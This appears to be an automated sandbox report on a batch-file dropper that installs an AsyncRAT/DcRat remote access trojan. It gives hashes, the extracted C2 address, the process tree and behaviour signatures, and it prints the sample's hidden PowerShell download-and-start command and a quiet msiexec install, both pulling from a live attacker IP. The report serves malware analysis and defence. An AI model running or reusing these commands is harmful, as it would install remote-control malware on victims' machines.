Analysis

max time kernel: 150s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-05-2024 19:30

Static task: static1
Behavioral task: behavioral1
    Sample: frobf.bat
    Resource: win7-20240221-en
General

Target: frobf.bat
Size: 17KB
MD5: 389078feb0d26c841b905168deaecd15
SHA1: e0013a66fad26afbbac701c3fbd6a0d85ddce3c9
SHA256: f21b7aec9770dc80d20ac5fd871b6b88b7ba4586c2ae56faf724a23ee64a6193
SHA512: ce51959c6d29112e575350013be45f87907edb9dc2c6bc3c8dc566e251a350bc361380202c34874aef71085f745dbf4e4ae4a760f457f49ff5e36f238785d238
SSDEEP: 192:oZYztAEqvAb5JqjbLoUfSY1PfcLCL6lh2uxHwNy/FDcTjNolW/uw6yfzyKe:oZY5AEqvA5JEoiJ1PfcL1PDwiMVvWKe
Malware Config

Extracted: http://103.179.189.111/porn.png

Extracted: asyncrat
    Version: 1.0.7
    Botnet: Default
    C2: 103.179.189.111:8848
    Mutex: DcRatMutex_qwqdanchun
    delay: 1
    install: false
    install_folder: %AppData%
Signatures

Async RAT payload (1 IoC)
    resource: C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files\Client.exe
    yara_rule: family_asyncrat

Blocklisted process makes network request (2 IoCs)
    flow 6: PID 3956 powershell.exe
    flow 24: PID 1820 msiexec.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
    Runs PowerShell with the display window hidden.

Executes dropped EXE (1 IoC)
    PID 1900 Client.exe

Loads dropped DLL (1 IoC)
    PID 2156 MsiExec.exe

Modifies file permissions (1 TTP, 1 IoC)

Use of msiexec (install) with remote resource (1 IoC)
    PID 2284 msiexec.exe
Enumerates connected drives (3 TTPs, 23 IoCs)
    Attempts to read the root path of hard drives other than the default C: drive.
    File opened (read-only) by msiexec.exe: \??\B:, \??\E:, \??\P:, \??\V:, \??\X:, \??\Z:, \??\G:, \??\O:, \??\T:, \??\W:, \??\Y:, \??\A:, \??\H:, \??\J:, \??\K:, \??\R:, \??\U:, \??\I:, \??\L:, \??\M:, \??\N:, \??\Q:, \??\S:
Drops file in Windows directory (7 IoCs)
    File opened for modification    C:\Windows\Installer\                                          msiexec.exe
    File created                    C:\Windows\Installer\inprogressinstallinfo.ipi                 msiexec.exe
    File opened for modification    C:\Windows\Installer\MSI3F4.tmp                                msiexec.exe
    File opened for modification    C:\Windows\LOGS\DPX\setupact.log                               EXPAND.EXE
    File opened for modification    C:\Windows\LOGS\DPX\setuperr.log                               EXPAND.EXE
    File opened for modification    C:\Windows\Installer\MSIFA4E.tmp                               msiexec.exe
    File opened for modification    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log       msiexec.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
    PID 3956 powershell.exe (2 entries)
    PID 1820 msiexec.exe (2 entries)
    PID 1900 Client.exe (all remaining entries; 64 IoCs in total)
Suspicious use of AdjustPrivilegeToken (38 IoCs)
    Token: SeDebugPrivilege                  PID 3956 powershell.exe
    Token: SeShutdownPrivilege               PID 2284 msiexec.exe
    Token: SeIncreaseQuotaPrivilege          PID 2284 msiexec.exe
    Token: SeSecurityPrivilege               PID 1820 msiexec.exe
    Token: SeCreateTokenPrivilege            PID 2284 msiexec.exe
    Token: SeAssignPrimaryTokenPrivilege     PID 2284 msiexec.exe
    Token: SeLockMemoryPrivilege             PID 2284 msiexec.exe
    Token: SeIncreaseQuotaPrivilege          PID 2284 msiexec.exe
    Token: SeMachineAccountPrivilege         PID 2284 msiexec.exe
    Token: SeTcbPrivilege                    PID 2284 msiexec.exe
    Token: SeSecurityPrivilege               PID 2284 msiexec.exe
    Token: SeTakeOwnershipPrivilege          PID 2284 msiexec.exe
    Token: SeLoadDriverPrivilege             PID 2284 msiexec.exe
    Token: SeSystemProfilePrivilege          PID 2284 msiexec.exe
    Token: SeSystemtimePrivilege             PID 2284 msiexec.exe
    Token: SeProfSingleProcessPrivilege      PID 2284 msiexec.exe
    Token: SeIncBasePriorityPrivilege        PID 2284 msiexec.exe
    Token: SeCreatePagefilePrivilege         PID 2284 msiexec.exe
    Token: SeCreatePermanentPrivilege        PID 2284 msiexec.exe
    Token: SeBackupPrivilege                 PID 2284 msiexec.exe
    Token: SeRestorePrivilege                PID 2284 msiexec.exe
    Token: SeShutdownPrivilege               PID 2284 msiexec.exe
    Token: SeDebugPrivilege                  PID 2284 msiexec.exe
    Token: SeAuditPrivilege                  PID 2284 msiexec.exe
    Token: SeSystemEnvironmentPrivilege      PID 2284 msiexec.exe
    Token: SeChangeNotifyPrivilege           PID 2284 msiexec.exe
    Token: SeRemoteShutdownPrivilege         PID 2284 msiexec.exe
    Token: SeUndockPrivilege                 PID 2284 msiexec.exe
    Token: SeSyncAgentPrivilege              PID 2284 msiexec.exe
    Token: SeEnableDelegationPrivilege       PID 2284 msiexec.exe
    Token: SeManageVolumePrivilege           PID 2284 msiexec.exe
    Token: SeImpersonatePrivilege            PID 2284 msiexec.exe
    Token: SeCreateGlobalPrivilege           PID 2284 msiexec.exe
    Token: SeRestorePrivilege                PID 1820 msiexec.exe
    Token: SeTakeOwnershipPrivilege          PID 1820 msiexec.exe
    Token: SeRestorePrivilege                PID 1820 msiexec.exe
    Token: SeTakeOwnershipPrivilege          PID 1820 msiexec.exe
    Token: SeDebugPrivilege                  PID 1900 Client.exe
Suspicious use of WriteProcessMemory (33 IoCs)
    PID 2420 cmd.exe wrote to memory of PID 1176 chcp.com          (2 entries)
    PID 2420 cmd.exe wrote to memory of PID 4672 cmd.exe           (2 entries)
    PID 2420 cmd.exe wrote to memory of PID 464 find.exe           (2 entries)
    PID 2420 cmd.exe wrote to memory of PID 4936 find.exe          (2 entries)
    PID 2420 cmd.exe wrote to memory of PID 4564 findstr.exe       (2 entries)
    PID 2420 cmd.exe wrote to memory of PID 4700 findstr.exe       (2 entries)
    PID 2420 cmd.exe wrote to memory of PID 2500 findstr.exe       (2 entries)
    PID 2420 cmd.exe wrote to memory of PID 4452 findstr.exe       (2 entries)
    PID 2420 cmd.exe wrote to memory of PID 3228 cmd.exe           (2 entries)
    PID 2420 cmd.exe wrote to memory of PID 3956 powershell.exe    (2 entries)
    PID 2420 cmd.exe wrote to memory of PID 2284 msiexec.exe       (2 entries)
    PID 1820 msiexec.exe wrote to memory of PID 2156 MsiExec.exe   (3 entries)
    PID 2156 MsiExec.exe wrote to memory of PID 736 ICACLS.EXE     (3 entries)
    PID 2156 MsiExec.exe wrote to memory of PID 5056 EXPAND.EXE    (3 entries)
    PID 2156 MsiExec.exe wrote to memory of PID 1900 Client.exe    (2 entries)
Processes

C:\Windows\system32\cmd.exe (PID 2420)
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frobf.bat"
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\chcp.com (PID 1176)
        chcp.com 437

    C:\Windows\system32\cmd.exe (PID 4672)
        C:\Windows\system32\cmd.exe /c type tmp

    C:\Windows\system32\find.exe (PID 464)
        find

    C:\Windows\system32\find.exe (PID 4936)
        find

    C:\Windows\system32\findstr.exe (PID 4564)
        findstr /L /I set C:\Users\Admin\AppData\Local\Temp\frobf.bat

    C:\Windows\system32\findstr.exe (PID 4700)
        findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\frobf.bat

    C:\Windows\system32\findstr.exe (PID 2500)
        findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\frobf.bat

    C:\Windows\system32\findstr.exe (PID 4452)
        findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\frobf.bat

    C:\Windows\system32\cmd.exe (PID 3228)
        C:\Windows\system32\cmd.exe /c type tmp

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3956)
        powershell.exe -WindowStyle Hidden -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://103.179.189.111/porn.png', \"$env:TEMP\al.png\"); start \"$env:TEMP\al.png\"}"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\msiexec.exe (PID 2284)
        msiexec /quiet /i http://103.179.189.111/Client.msi
        - Use of msiexec (install) with remote resource
        - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\msiexec.exe (PID 1820)
    C:\Windows\system32\msiexec.exe /V
    - Blocklisted process makes network request
    - Enumerates connected drives
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\syswow64\MsiExec.exe (PID 2156)
        C:\Windows\syswow64\MsiExec.exe -Embedding D8446F08BE7561A332BBF6422E679346
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\ICACLS.EXE (PID 736)
            "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
            - Modifies file permissions

        C:\Windows\SysWOW64\EXPAND.EXE (PID 5056)
            "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
            - Drops file in Windows directory

        C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files\Client.exe (PID 1900)
            "C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files\Client.exe"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4624)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3468,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=4204 /prefetch:8
Downloads

C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files.cab (47KB)
C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files\Client.exe (47KB)
C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\msiwrapper.ini (1KB)
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_55igihae.jwr.ps1 (60B)
C:\Users\Admin\AppData\Local\Temp\tmp (14B)
C:\Windows\Installer\MSI3F4.tmp (208KB)
C:\Windows\Installer\MSIFA4E.tmp (292KB)
Memory dumps

memory/1900-90-0x0000000000EE0000-0x0000000000EF2000-memory.dmp (72KB)
memory/3956-15-0x00007FFF91310000-0x00007FFF91DD1000-memory.dmp (10.8MB)
memory/3956-16-0x00007FFF91310000-0x00007FFF91DD1000-memory.dmp (10.8MB)
memory/3956-20-0x00007FFF91310000-0x00007FFF91DD1000-memory.dmp (10.8MB)
memory/3956-5-0x0000012BF0A10000-0x0000012BF0A32000-memory.dmp (136KB)
memory/3956-4-0x00007FFF91313000-0x00007FFF91315000-memory.dmp (8KB)